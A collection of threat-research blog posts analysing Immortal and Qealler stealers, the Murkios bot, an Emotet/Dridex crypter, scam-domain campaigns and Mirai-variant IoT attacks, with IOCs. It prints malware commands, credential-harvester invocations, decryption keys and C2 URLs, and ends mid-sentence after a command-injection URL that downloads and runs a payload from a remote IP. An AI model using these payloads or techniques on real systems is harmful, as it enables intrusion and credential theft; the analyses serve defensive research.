Recently, the Zscaler ThreatLabZ team came across new information-stealer malware called Immortal, which is written in .NET and designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions. This blog provides an analysis of the data Immortal steals from browsers, the files it steals (and the applications it steals from), and what it does with the stolen data. Immortal starts its infection by creating a directory with a random name in a temp folder. Next, it creates a password.log file in "\%Temp%\{Random_DirName}\password.log”. Immortal writes the malware name, author’s name, and telegram address of the author in a password.log file. Date: Current date and time  “MM/dd/yyyy HH:mm:ss” Windows Username: Username HWID: MachineGuid System: Operating system name Browser info stealing Immortal steals data from 24 browsers. It steals stored credentials, cookies, credit card data, and autofill data from the targeted browsers. When the user saves a username and password in the targeted browser, it stores the data in a “Login Data” file in an SQLite database format, and the browser-stored cookie information in the “Cookies” file. It also stores autofill data, credit card data, and other web information in the “Web Data” file. Below are the file paths for those files: “\%AppData%\Local\{Browser}\User Data\Default\Login Data” “\%AppData%\Local\{Browser}\User Data\Default\Web Data” “\%AppData%\Local\{Browser}\User Data\Default\Cookies” List of targeted browsers: Chrome Yandex Orbitum Opera Amigo CentBrowser Torch Comodo Go! ChromePlus Uran BlackHawk CoolNovo AcWebBrowser Epic Browser Baidu Spark Rockmelt Sleipnir SRWare Iron Titan Browser Flock Vivaldi Sputnik Maxthon Credential stealing The malware fetches credentials from the “Login Data” file and stores them in the password.log file as per the format below: Path: ” \%Temp%\{Random_DirName}\password.log”. SiteUrl: Website URL Login: Username Password: Password Program: Targeted browser Cookie stealing Immortal fetches cookie data from the cookies file and stores it in {Browsername}_cookies.txt file. Path: “\%Temp%\{Random_DirName}\Cookies\{Browsername_cookies.txt}". The format is shown below. Credit card data Immortal fetches credit card data from the “Web Data” file and stores it in the {Browsername}_CC.txt file. Path: “\%AppData%\{Random_DirName}\CC\{Browsername_CC.txt}”. The format is shown below. Autofill data The autofill feature of a browser allows the user to store commonly entered information in web forms. This information might include username, email, password, address, and credit card information. So, when the user opens a web page, it will automatically fill in the information already saved by the browser. The autofill information is stored in the “Web Data” file. Immortal fetches autofill data from the “Web Data” file and stores it in the {Autofill}_CC.txt file. Path: “\%AppData%\{Random_DirName}\Autofill\{Browsername_Autofill.txt}”. The format is shown below.   File stealing Immortal steals files from many different applications. The details are below. Minecraft launchers The malware steals user data files and sessions from Minecraft launcher applications. The malware copies those applications' files into “%Temp%\{Random_DirName}\Applications\{AppName}\”. The following is a list of the applications: MinecraftOnly McSkill LavaCraft MinecraftLauncher VimeWorld RedServer Steam The malware steals files for the Steam application. Steam is an application for playing, discussing, and creating games. The files stolen by Immortal are as follows: SSFN (2 files) VDF files from the config folder Config.vdf loginusers.vdf Telegram and Discord Immortal also steals session-related files from Telegram and Discord. Telegram is a cloud-based instant messaging and voice over IP service. Discord is the cross-platform voice and text chat application designed to help gamers talk to each other in real time. Immortal copies those files into “%Temp%\{Random_Name}\Applications\{AppName}\”. File Path: %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\ %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map0 %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map1 %AppData%\discord\\Local Storage\\https_discordapp.com_0.localstorage FileZilla Immortal steals files that contain FileZilla credentials. FileZilla is a known FTP tool used for file transfer. The malware copies the below files into “\%Temp%\{Random_DirName}\FileZilla\”. \%AppData%\Filezilla\recentservers.xml \%AppData%\Filezilla\sitemanager.xml Bitcoin-Qt wallet Immortal steals wallet.dat files from Bitcoin-Qt, a free and open-source Bitcoin wallet software. Below is a screenshot of the code for fetching the wallet path from the registry. The malware copies the wallet.dat file in “%Temp%\{Random_DirName}\”. Desktop files Immortal also goes through every file in the desktop folder on the victim’s system. It steals extension files (listed below) and copies them into “%Temp%\{Random_DirName}\Files\”. Txt Log Doc Docx sql Screenshot & Webcam Immortal takes a screenshot of the desktop of the infected system and saves it in “\%AppData%\{Random_DirName}\desktop.jpg”. It also captures a webcam snapshot and saves in it “\%AppData%\{Random_DirName}\CamPicture.jpg”.   Network communication The malware stores all the stolen data in the directory “\%Temp%\{Random_DirName}\”. After that, it compresses all the files in a ZIP archive and saves the compressed file in \%Temp%\{Random_filename}.zip. Further, it sends {Random_filename}.zip to its command-and-control server as shown below. It also deletes the “\%Temp%\{Random_DirName}\” before sending the ZIP file. User = User name Hwid = MachineGuid At the time of analysis, the command & control panel for this stealer was live. We found the Immortal stealer being advertised and sold with different build-based subscriptions. The following is a screenshot of a page that describes all of Immortal's functionality and cost per build. A per-post price for one build is $30. IOCs Md5: 1719ff4ff267ef598a1dcee1d5b68667 Downloading URL : www.appleidservice[.]jp/stealer/files/svhost.exe NetworkURL: www.appleidservice[.]jp/stealer/files/upload.php  

Last summer, a ThreatLabZ blog covered scam campaigns in which bad actors using .tk domains were showing warnings of a fake malware infection and trying to generate revenue by offering remediations.  We recently noticed the development of similar campaigns in which bad actors are making use of cheap domains, registering them in bulk, and scamming people in an attempt to generate revenue. In this blog, we will cover a few of such campaigns.   Infrastructure Sharing In our research last year, we noticed that domains with patterns such as some-domain[.]tk/index/?{random-long-int} were primarily showing support scams, such as alerting users that their systems had been infected with malware or claiming an infected site was from Microsoft and asking the user to use the hotline number provided. Once contacted, the scammer would take money from the end-user and perform random actions, show the filesystem tree, and claim the system was fixed. This year, we are seeing slightly different behavior in which the same URI patterns are being leveraged for other scam redirections. Fig. 1: Infection chain  The main site is injected with a malicious script responsible for malicious redirection chaining. Fig. 2: Injected scripts These injected scripts/URLs load different types of content in different iterations. Fig. 3: Redirection chain At the moment, these .tk domains are redirecting to various fake sites, including foreign exchange (forex), credit card, and healthcare, but the attacker can easily add more fake sites from other categories. Fig. 4: Final .tk redirection to fake site There are more than 700 .tk domains hosted on 185.251.39[.]220 and more than 80 .tk domains on 185.251.39[.]181, which are associated with this campaign.  Domain squatting leads to tech support scam We came across interesting instances in which a Google Mail squatted domain gmil[.]com was responsible for a Microsoft Tech Support scam redirection. Fig. 5: Google Mail squatted domain leading to Microsoft Tech Support scam The scam page that we received is similar to what we saw in our previous analysis, and there has been little to no development. Fig. 6: Support scam page The page microsft0x8024f0059rus[.]ml is hosted on 216.10.249[.]196, which is hosting over 400 .ga, .cf, .gq, .ml, and .tk domains; all are involved in Microsoft tech support scam activity.   PopCash leading to fake sites, including medicine, tax debt relief, repair services, and adult sites Fig. 7: PopCash redirecting to fake sites that use the same page template In another redirection iteration, we saw adult-themed sites and a fake medicine site claiming to be CNN. Fig. 8: Adult themed site and fake CNN page selling Viagra   Fake airlines We also spotted fake airline sites using an identical template, contact number, and Google gtag. Fig. 9: Similar fake airline sites The use of the nearly identical template means there is a scam kit being used to automatically generate their page content. Fig. 10: Template comparisons The IP address 103.25.128[.]224 is hosting 70 or more of these fake airline sites. Conclusion Scam campaigns leveraging cheap domains such as .tk, .ga, .gq, .ml, .cf, and others have been on the rise for past few years now. Because registering such domains is very inexpensive, bad actors are doing bulk registrations for such domains and using them to generate revenue. While some of these sites are poorly designed and obvious scams, others are sophisticated and look very much like the real brand. Always look at a site’s URL to make sure the site is legitimate before initiating communications or making any kind of transaction. Zscaler ThreatLabZ is actively monitoring scamming sites and other threats to ensure coverage and will continue to share information on these campaigns. IOCs All scam domains involved in the above campaigns can be seen here.

Once seen as the ultimate protection for data being transmitted over the internet, encryption has become a vast playground for cybercriminals. Zscaler ThreatLabZ, the research organization at Zscaler, analyzed the encrypted traffic traversing the Zscaler cloud in the second half of 2018 and prepared a report of our findings. The Zscaler cloud processes more than 60 billion transactions a day and, at that volume, it provides valuable insight into traffic patterns and the types of threats organizations are facing globally. We already knew that the use of encryption had been rising each year and our research showed this trend continuing. By December 2018, the amount of encrypted traffic on the Zscaler cloud increased by 10 percent to nearly 80 percent of all traffic. This growth rate is consistent with that of the Google Transparency Report and Mozilla’s findings for the Firefox browser. Zscaler has always made its cloud statistics available to anyone who wants to see them. We have recently created a dashboard that shows the volume of encrypted traffic crossing our cloud as a percentage of total traffic. You can view that interactive dashboard here. Real-Time Zscaler Cloud Activity: Encrypted Traffic Dashboard As the use of SSL* grows, cybercriminals are increasingly using encryption to conceal and launch attacks. In the second half of 2018, the Zscaler cloud blocked 1.7 billion threats hidden in SSL traffic, which translates to an average of 283 million advanced threats blocked per month. The top blocked threat categories in our study period included phishing attempts—which increased more than 400 percent over 2017—as well as malicious content, botnets, and browser exploits. One of the reasons that SSL-based threats have increased so dramatically is because SSL/TLS certificates, which were once expensive and difficult to obtain, are now easy to get—at no charge. The vast majority of the certificates involved in security blocks in the Zscaler cloud were issued by Let’s Encrypt, a free service. Furthermore, nearly 32 percent of newly registered domains that were blocked by our cloud were using SSL encryption to deliver the content. We recommend inspecting and/or restricting access to newly registered domains, including those using SSL, to scan for malicious content being delivered from an otherwise unknown location with no history or reputation. While the percentage of growth in SSL traffic is slowing as it reaches near totality, the threat trends are increasing in both frequency and sophistication. Cybercriminals know that most organizations are unable to inspect SSL traffic at scale. So, with malicious websites that can be set up in no time with free SSL certificates, they’re launching attacks that have a good chance of going undetected. Organizations should be inspecting all encrypted traffic, even from CDNs and trusted sites, because many of the threats we continue to block are from legitimate sites that have been compromised. Organizations that don’t inspect all traffic are at risk of infiltration that can be difficult to remediate, lead to costly breaches, or damage their reputation. Read the full ThreatLabZ analysis of SSL/TLS-based threats: SSL Report   *The encryption protocol is known by several terms—Secure Sockets Layer (SSL), Transport Layer Security (TLS), and HTTPS—and they are often used interchangeably. For the sake of simplicity, I am using “SSL” in this blog.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is Zscaler VP of Security Research and Operations

The Zscaler ThreatLabZ team came across the Murkios bot, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server by opening Secure Shell (SSH) terminals from the compromised system. This bot also installs “Plink,” which is legitimate remote sharing software that runs via command prompt using different switches from the C&C server. The bot appeared to have been written by Russian malware authors, which we were able to confirm after seeing some snippets in the resource section. The screenshot below shows the malware tests on different operating systems. During our analysis, we saw the following files being dropped by Murkios: Win XP: %AppData%\ssh\start.exe %AppData%\ssh\systems.exe %AppData%\ssh\winsys.exe %AppData%\ssh\winsystem.exe %AppData%\ssh\uid.txt %AppData%\ssh\sel.txt Win 7/Win 10: %AppData%\Roaming\ssh\start.exe %AppData%\Roaming\ssh\systems.exe %AppData%\Roaming\ssh\winsys.exe %AppData%\Roaming\ssh\winsystem.exe %AppData%\Roaming\ssh\uid.txt %AppData%\Roaming\ssh\sel.txt Below is a summary of activities performed by dropped files: systems.exe – Installs RDP wrapper library winsystem.exe – Legitimate Plink PuTTY command line tool winsys.exe – Module acts as a mule sending all the harvested information to the attacker and has screen capture functionality start.exe – Has functionality to bypass UAC, checks OS version installed, executes other modules such as winsys.exe, adds net user accounts uid.txt – Stores unique identification (UID) of the victim's system All the dropped files are present in the resource section of the parent file. The malware tries to bypass the User Account Control (UAC) to execute which, in turn, establishes a connection with the C&C server and steals system information from the victim’s system. The malware checks to see if the UAC value is enabled in the registry; if it is already set to “1” (which means UAC access control is enabled in the system), it will delete the mscfile and create a new mscfile and put the start.exe file path in it, which is placed in the application directory. Next, it checks whether the system is 32 bit or 64 bit: The start.exe further creates schtask.exe to execute winsys.exe, which installs the legitimate remote sharing tool onto the victim’s system. Parameters: /sc: Specifies Schedule Type ONLOGON: The task runs whenever a user (any user) logs on /tn:         Specifying the name of the task /tr:         Specifies the program or command that the task runs ’winsys.exe’ in our case The malware uses the net user command to add a user account and sets a password from the command prompt in hidden mode.   Enabling remote desktop from the command prompt: Parameters: /MAXPWAGE: UNLIMITED: Never expire the password. localport=3389: The server listens on TCP port 3389, which is the port Microsoft uses for Windows Remote Desktop, and makes remote assistance connections which are also used by Windows terminal users. It tries to change the Remote Desktop Protocol-Transmission Control Protocol (RDP-TCP) connections permissions in the Windows registry through the Microsoft Windows terminal service. The malware can take control of a remote computer or virtual machine over a network. This malware is using the following commands while in RDP.   Functions Description AllowTSConnections   Ready to make the connection for remote desktop from terminal service fDenyTSConnections Allows or denies connection to Terminal Services; possible values are 0 or 1. 0 MaxConnectionTime Maximum session time in seconds MaxDisconnectionTime   Maximum time in seconds after which disconnected sessions are ended MaxIdleTime   Maximum idle time in seconds for user sessions   Further, the system.exe process is hidden using the switch mode through cmd.exe and installs RDP Wrapper files into the C:\Program Files\RDP Wrapper directory, which enables Remote Desktop Host support and concurrent RDP sessions on home systems with reduced functionality. The RDP Wrapper works as a layer between the Service Control Manager and Terminal Services, so the original termsrv.dll file remains untouched. Sends data to C&C: After sending data to the server, the malware executes winsys.exe, which then executes winsystem.exe to download Plink PuTTY software. The winsys.exe executable also runs in hidden mode through the command prompt. Winsys.exe This module acts as a mule and sends all the information to the attacker. This module has three functions. The first function captures the screen from the compromised system and sends it to the attacker. After receiving the screen capture from the compromised system, the attacker gives the acknowledgment “online=ok” and sends the UID and screen capture from the compromised system back to the attacker. Finally, the malware tries to make an SSH tunnel to 193.238.46.117 in hidden mode with multiple arguments, as shown below. -P :         connect to the specified port -hostkey:     manually specify a host key -batch:        disable all interactive prompts -pw:          login with specified password IOC: Md5: soft.exe 32dd601839d62e939880d03a81fde5e8 Dropped files: Filename Md5 system.exe 6E83A0F762F014924E24D81C07021690 winsys.exe 473ED02A55DC91A6E719F270DF16AE35 winsystem.exe 528248AE133191C591EC6D12732F2CFD start.exe 2A07FE3AEBD009D7308FD25E0C872CF9s uid.txt E46B1D5A895E0E15C3CF0F2BA05DAB45   Download URL: murikos[.]in/soft.exe  

A crypter is software that can encrypt, obfuscate, and manipulate malware to make it harder to detect by security programs. The Zscaler ThreatLabZ research team recently spotted a common crypter being used in the recent Emotet, Qbot, and Dridex campaigns. This same crypter was observed in some of the Ursnif and BitPaymer campaigns as well. One of the reasons that Emotet and Dridex were able to survive for so long can be attributed to their ability to evade detection through the use of a volatile and polymorphic crypter, which wraps its original binary inside to complicate its detection and analysis. Emotet is modular malware that primarily functions as a downloader or dropper for other banking Trojans. Emotet has been active for the past four years and it was one of the most prevalent malware families of 2018. In previous blogs, we analyzed Emotet and one of its delivery campaigns. Dridex is a banking Trojan that evolved from the Zeus Trojan family. Dridex remains active in the wild even after the FBI’s takedown attempt in 2015. Qbot can allow remote access to a victim’s system, steal information, and upload this stolen information to the attacker’s remote server. Recently, Emotet’s payload URLs were found to be serving Qbot and were using the same crypter we’re examining in this report. This crypter provides multiple layers of protection on its core malware binary. In this research, we will describe the properties of crypted binaries that hold true across various mutations. These properties can be validated statically (without executing the binary) and used to write a decrypter. Below is a pictorial view of how Emotet’s core binary is digested inside the crypter’s layers of obfuscation and encryption wrappers. 0. Core binary 1. Code is obfuscated by shuffling instructions and substituting jump instruction 2. Obfuscated binary is encrypted and appended at the end of the custom loader binary 3. File alignment of custom loader binary is jumbled 4. Custom loader binary is encrypted 5. Final binary encapsulating scattered chunks of encrypted custom loader binary   Image 1: Stages occur in crypter Our goal is to reverse each of above stages to get the core malware binary. Furthermore, the core binary is supposed to be independently loadable/executable, and IOCs should be easily extractable. So, starting with stage 5, we will describe certain heuristics properties of the binary and using these properties we will decrypt the stage and continue to track down till stage 0. In our analysis, we found that these heuristics properties hold true across all mutations of the binaries.   Stage 5: The 5th stage binary is the Emotet executable file that is downloaded via malicious links in MalSpams or malicious macros in MS Office documents. Our goal in stage 5 is to reach stage 4 to obtain the encrypted custom loader binary. As we can see in image 1, the binary at this stage contains scattered chunks of encrypted custom loader binary. We need to spot these chunks and assemble them in the proper order. Before discussing how we are going to do this, what follows are few examples of how these chunks can be spread across the binary. The chunks are outlined in red. Image 2. Examples of chunk patterns From the above examples, we can see that these chunks are not found in fixed locations, as their sizes are inconsistent, and the order of chunks varies, too. Therefore, our first challenge is to locate these chunks and arrange them in the proper order. The good news is that we know the crypter will also need to arrange the chunks and will do so by storing the chunk addresses and sizes in a table. Let’s call this table “Chunk Descriptor Table.” The bad news is that this table cannot be found in a predictable location in the binary nor is the structure of the table is constant across mutations of the binary. Below are some of the variants of this table structure. Chunk Descriptor Table is basically an array of the Chunk Descriptor Entry. struct ChunkDescriptorEntry[n] ChunkDescriptorTable; // n == number of chunks Image 3: Examples of Chunk Descriptor Table structures   In above structure, “chunkAddressDword” contains the virtual address of chunk. The size of chunk can be obtained by one of following operations on “firstDword” and “secondDword”. This operation is constant across all chunk descriptor entries. unsigned int chunkSize = firstDword + secondDword unsigned int chunkSize = firstDword ^ secondDword unsigned int chunkSize = secondDword - firstDword Heuristics properties of Chunk Descriptor Table: 0 5 out of 8. Chunks do not contain consecutive 4 zeros. The following is the pseudo code for finding the chunk pattern. The function “FindChunkEntry” return offset of chunk and the distance of firstDword, chunkAddressDword from the beginning of the chunk offset. If the return value of three consecutive calls to function and length between three returned offsets are equal, then the whole array can be parsed to generate an associative array of chunk addresses and chunk sizes. (offset1, m1, n1) = FindChunkEntry(filedata, fileSize) (offset2, m2, n2) = FindChunkEntry(filedata + offset1, fileSize) (offset3, m3, n3) = FindChunkEntry(filedata + offset2, fileSize) If (offset2 - offset1) == (offset3 – offset2)     // found the FindChunkEntry array FindChunkEntry(filedata, fileSize)         p = 0         while p > fileSize                 firstDword = filedata[p]                 q = p                 while q dwOrgInstrVAdddress !=  0x00) {         patchOffset = GetFileOffsetFromRVA(         pCorePEHeader,         pCoreSectionHeaders,         pDeObfuscationTable-> dwPatchRVAddress);         orgInsOffset = GetFileOffsetFromRVA(         pLoaderPEHeader,         pLoaderSectionHeaders,         pDeObfuscationTable-> dwOrgInstrVAdddress - pLoaderPEHeader-OptionalHeader.ImageBase);         memcpy (                 pbyCoreFileData + dwPatchOffset,                 pbyLoaderFileData + orgInstrOffset,                 pDeObfuscationTable->dwOrgInstrLength);         pDeObfuscationTable += 1; }   At this stage, we would have obtained the plain, independently executable core Emotet binary, which can be decompiled by IDA or can be bin-diffed with other binaries extracted by this decoder.  

Recently, the Zscaler ThreatLabZ team came across a new type of malware called Qealler, which is written in Java and designed to silently steal sensitive information from an infected machine. Qealler is a highly obfuscated Java loader that deploys a Python credential harvester. We first saw this payload hit Zscaler Cloud Sandbox on Jan 21, 2019, and below is a screenshot of the detonation report. Fig. 1: Zscaler Cloud Sandbox report This threat makes use of social engineering techniques to initiate the infection, as the malicious JAR file has to be executed by the user. These malicious JAR files are portrayed as invoice-related files, requiring the user to double-click on the file to open it. We have been monitoring this campaign for the past two weeks, and the malware has been quite active, spiking this week. Fig. 2: Hits of Qealler in a week The malicious JAR file (named Remittance.jar), which we analyzed, was getting downloaded from a compromised site (hiexsgroup.co[.]uk). It is heavily obfuscated with Proguard Java obfuscator. After deobfuscation and decompilation, we saw encrypted URLs that are accessible by a key, as shown in the figure below. Fig. 3: Accessing encrypted URLs The sample has a “synchronized” file that contains key-value pairs. Fig. 4: Key-Value pair of encrypted URLs On execution, this sample first creates two file paths in %USERPROFILE% by checksum of hardcoded strings. Fig. 5: File Path creation File path 1: %USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“lib”)\\CRC32(“8e65457409fea4b2a183125f1c0f552080edb4cefa516b14698cb8d0abf5bb6dFILE”) Equivalent to: %USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\83e7cdf9 File Path 2: %USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“lib”)\\CRC32(“0e10ad6938994f2466b192d8f29217ad39155b8a3a082b6412048f4a12126b3bFILE”) Equivalent to: %USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\db2bf213 If the above two files don’t exist, the malicious file decrypts the URL, downloads these two files, and stores them in the same place. Fig. 6: Encrypts and drops downloaded module The value of LIB_7Z_URL in the synchronized file is “xVQR4PWAw91AhkgaMsQVAVV1igV7HSOV1dqWgFN23eQtkNRd23RzTnPVGB9/iVYA” which is decoded by BASE64 and decrypted by AES-EBC with the hardcoded key “bbb6fec5ebef0d93”. The final URL after decryption is hxxp://82.196.11[.]96:55326/lib/7z The value of LIB_QEALLER_URL in the synchronized file is “xVQR4PWAw91AhkgaMsQVAaWhGxVQIpMxX60ZE+OpV3KjNnWvOARi0rccZaVSvle8”, it is also decrypted by the same algorithm with the same key. The final URL is hxxp://82.196.11[.]96:54869/lib/qealler The sample downloads the data from these URLs and encrypts it using the AES algorithm with the key generated by SecureRandom() having hardcoded seed value “2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”. AES key: 39 3e df 7e fc 58 be 20 60 e4 78 bb 4a 91 38 72 After encryption, it stores both files at the below locations to avoid further downloading in the next run: %USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\83e7cdf9 (/lib/7z) %USERPROFILE%\\a60fcc00\\bda431f8\\a90f3bcc\\db2bf213 (/lib/qealler) Fig. 7: Created path and dropped files Along with these two files, the virus creates another file path with the following algorithm and stores an encrypted unique machine ID in it. The ID is generated by a random number of system nanoTime. Machine ID path: %USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“machine”)\\CRC32(“id”)\\CRC32(“d”)\\CRC32(“q”) Equivalent to: %USERPROFILE%\\a60fcc00\\bda431f8\\1505df84\\bf396750\\98dd4acc\\99de3ada After the downloading and decryption steps are completed, the sample stores a decrypted copy of 83e7cdf9 and db2bf213 in the %TEMP% directory with the name “_.tmp”.  _502560701855008616300501457487639.tmp _502562165489004300569223733573535.tmp _502560701855008616300501457487639.tmp (/lib/7z) is again a JAR file that doesn’t have any Java code inside, but contains three PE files inside the libraries as shown in Fig 8. Fig. 8: Content of _502560701855008616300501457487639.tmp (/lib/7z) 7za.exe is a repackaged version of 7-zip to ensure the malware executes successfully even if the user does not have it installed by default. The 7-zip (7za.exe) and its modules (7za.dll, 7zxa.dll) will be extracted from 7z.jar by the main sample and saved in the %TEMP% directory with the name “7z_.exe” and “7z_.dll”. 7z_502574395484008643130462441900754.exe 7z_502567545558005642490654395727502.dll 7z_502579570140002751296504101539829.dll After extraction, the 7-zip executable is called by the main sample with the following command-line options:  %TEMP%\\7z_502574395484008643130462441900754.exe x %TEMP%\\_502562165489004300569223733573535.tmp -o%TEMP% -p”bbb6fec5ebef0d936db0b031b7ab19b6” -mmt -aoa -y The downloaded Qealler module _502562165489004300569223733573535.tmp (/lib/qealler) is a password-protected file with 7-zip. The above command will extract the Qealler module in the %TEMP% directory with the password: bbb6fec5ebef0d936db0b031b7ab19b6 -mmt: use multithreading mode -aoa: set overwrite mode -y: assume yes for all the prompts The Qealler module is the key component of this malware. The extracted Qealler module contains Python 2.7.12 with the installed packages to ensure the malware will execute even if the user does not have it installed by default. The Qealler also has a directory named QaZaqne. It is a custom version of the open source project called LaZagne. LaZagne is used to retrieve lots of passwords stored on a local computer. This is the same functionality of QaZagne, which finds and steals credentials of the most commonly used software from local machines. Fig. 9: Content of extracted _502562165489004300569223733573535.tmp (/lib/qealler) After extraction, the main sample (Remittance.jar) executes a Python file of QaZagne (main.py) with the following option and takes the JSON output: %TEMP%\\qealler\\python\\python.exe %TEMP%\qealler\qazaqne\main.py all Fig. 10: Stealer functions in QaZaqne module This will get the credentials of all the software shown in the figure below: Fig. 11: Qealler steals credentials of the software in this table The output of the QaZagne on an infected Windows machine is shown in Fig 12. It is in JSON format and contains the credentials of CoreFTP and a Windows credential manager. It always starts with #fs# and ends with #ff#. Fig. 12: JSON output of QaZaqne module The main sample parses this output, fetches below system information, and encrypts it using an AES-EBC algorithm with key “bbb6fec5ebef0d93”. Fig. 13: Fetch and encrypt system info The final information scraped from the infected machine before encryption is shown below. Fig. 14: Scrapped data from an infected machine Here, machine_id is a unique ID generated by system nanoTime and uuid is encrypted in a synchronized file. This output is encrypted and encoded with BASE64 and sent to the command-and-control (C2) server, whose URL is an encrypted value of the key “d7c363a2019dac744cf076e11433547a47907e2c2f781e2d1c8f59a40c57dd03” in a synchronized file. C2 URL: hxxp://82.196.11[.]96:56636/qealler-reloaded/ping Fig. 15: Data sent to C2 In the post headers, q-qealler-id is the encrypted machine ID and q-qealler-stub-id is the encrypted hash of the machine ID and system time. The request body contains encrypted and encoded system information and stolen credentials. If the C2 server is active and data is successfully sent to the server, it will respond with the encrypted status, which looks like the following after decryption:  {"status":"2000","message":"success","extended":[],"time":1548096059}   IOCs: hiexsgroup.co[.]uk/?_sm_nck=1 lcbodywowrksltd[.]online willsonsolicitors[.]biz willsonsolicitors[.]online willsonsolicitors[.]store mcneilspecs[.]com mcneilspecs[.]org mcneilspecs[.]net prestigebuildersltd[.]com prestigebuildersltd[.]net larrgroup.co[.]uk/remittance%20advice.jar prestonbuildersltd.co[.]uk/remittance%20advice.jar otorgroup.co[.]uk/remittance%20advice.jar ultrogroup.co[.]uk/remittance%20advice.jar stgeorgebuildltd.co[.]uk/remittance%20advice.jar gregoryteebuilders.co[.]uk/remittance%20advice.jar txjxgroup.co[.]uk/remittance.jar kingagroup.co[.]uk/remittance%20advice.jar hiexgroup.co[.]uk/remittance%20advice.jar salmogroup.co[.]uk/remittance%20advice.jar   4f77bf588e0b721e68971059b0cefe21 (Remittance Advice.jar) b0ba5d6fdd26d81a6a2f050600ade3f0 (Remittance Advice.jar) d742beba17f7893b2b4989661652a66f (Remittance Advice.jar) 61ecd8f17d405fa1c29dd78008011250 (Remittance Advice.jar) ccac2b99cb4b72bc7728a8fc42ccc4ad (Remittance Advice.jar) 76e87575e76b2ea28e1bb49e4c280152 (Remittance Advice.jar) 7854ccf3208f805da7ec19a067ae3abe (Remittance Advice.jar) ca741116466d5ddbcb76df00748bb885 (Remittance Advice.jar) 9b7ebeff190cef02a7c22072d3d26ab3 (Remittance Advice.jar) 639865eb7fac1b405b223cb4b7fe9ada ({E60A953D}-Remittance Advice.jar) e6fdc2140f6047fad60720cdf2157f9c (Remittance.jar) aae120bf74131d04e47d99b16af41120 (Remittance.jar) 3d43a83b1c8877e782ff69650ec00449 (Remittance.jar) 4d433929f175c6df366aed139bf34f85 (Remittance.jar) 2ed3b8cdc87a11437f5a15302ce047d6 (Remittance.jar) 8e0f4cb12c6f2fef3a8ff731c195843d (Remittance.jar) fc20f0068b71cc74e9061a0ea2b5d45a (Cred_Adv043H3272.jar) 791217f372c347f53003ae8a26a2fe54 (Cred_Adv043H3272.jar) a593cb286e0fca1ca62e690022c6d918 (7z.jar) 8d2c718599ed0aff7ab911e3f1966e8c (qealler.jar) 5a8915c3ee5307df770abdc109e35083 (main.py)   82.196.11[.]96:54869/lib/qealler 82.196.11[.]96:443/lib/qealler 128.199.60[.]13:443/lib/qealler 37.139.12.136:443/lib/qealler 192.81.222[.]28:41210/lib/qealler 37.139.12[.]169:23980/lib/qealler 37.139.12[.]169:16901/lib/qealler 176.58.117[.]125:8676/lib/qealler 176.58.117[.]125:8796/lib/qealler 146.185.139[.]123:6521/lib/qealler 159.65.84[.]42:10846/lib/qealler 159.65.84[.]42:12536/lib/qealler 139.59.76[.]44:4000/lib/qealler   128.199.60[.]13:47222/lib/7z 128.199.60[.]13:443/lib/7z 128.199.60[.]13:46061/lib/7z 82.196.11[.]96:54869/lib/7z 82.196.11[.]96:443/lib/7z 37.139.12[.]136:443/lib/7z 192.81.222[.]28:39871/lib/7z 176.58.117[.]125:8650/lib/7z 176.58.117[.]125:8796/lib/7z 159.65.84[.]42:11268/lib/7z   82.196.11[.]96:56636/qealler-reloaded/ping 37.139.12[.]136:36561/qealler-reloaded/ping 128.199.60[.]13:56636/qealler-reloaded/ping 192.81.222[.]28:46871/qealler-reloaded/ping 176.58.117[.]125:5797/qealler-reloaded/ping    

Since the Mirai botnet source code was leaked in 2016, it was inevitable that we’d see its variants being put to use in IoT threat campaigns. Apart from using brute-force techniques to attack IoT devices through various protocols, the botnet also seems to be leveraging vulnerabilities present in IoT devices to infect other IoT devices. These vulnerabilities are mostly in management frameworks and, by exploiting them, attackers are achieving remote code execution. This typically results in turning the infected device into a bot which in turn forms a bigger botnet army. In some cases, we also saw cryptominers as the final payload delivered in the IoT campaigns. The Zscaler ThreatLabZ team has been actively tracking these IoT attacks and analyzing their behavior, exploits, and payloads. In this blog, we will summarize our observations about a few of the more prominent IoT attacks we observed. The graph below shows the IoT attacks we detected over the last three months. Fig. 1: Detection timeline of prominent IoT threats We observed a significant spike in detection at the start of January 2019. The spike was due to the heavy adoption of the ThinkPHP exploit, which we’ll describe later in the report. RIFT botnet The RIFT botnet emerged in December 2018 and uses a variety of exploits to infect IoT devices. According to online sources, the botnet used 17 exploits. The table below includes some of the more prominent RIFT exploits and those that continue to be active. Fig. 2: Observed active exploits used in RIFT attack Most of the vulnerabilities exploited were Remote Code Execution (RCE) or Command Injection types. It was surprising to see the use of WordPress-based websites into IoT devices. This indicates the use of readily available frameworks in IoT devices is increasing due to ease of integration. The following are typical post-exploitation steps: Download the payload using “wget” command The payload downloaded was Shell script or ELF file In case of Shell script as payload, it downloads the ELF file depending on the code present inside it Store the payload into “/tmp” directory Make the payload executable using “chmod” command chmod 777 Run the payload /tmp/ Let’s take a sneak peek into one of the exploits we observed in the RIFT attack. CVE-2015-2280 – AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera OS command execution vulnerability There is an OS command injection vulnerability in “snwrite.cgi”. The OS command can be injected through the parameter “mac”. The exploit URL looks like the following: /maker/snwrite.cgi?mac=1234;wget%20http:// 89.46.223.70/airlink[.]sh%20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod Post successful exploitation of this vulnerability, the “wget” command downloads the shell script payload from the URL “hxxp://89[.]46[.]223[.]70/airlink.sh” and stores the payload using “-O” switch 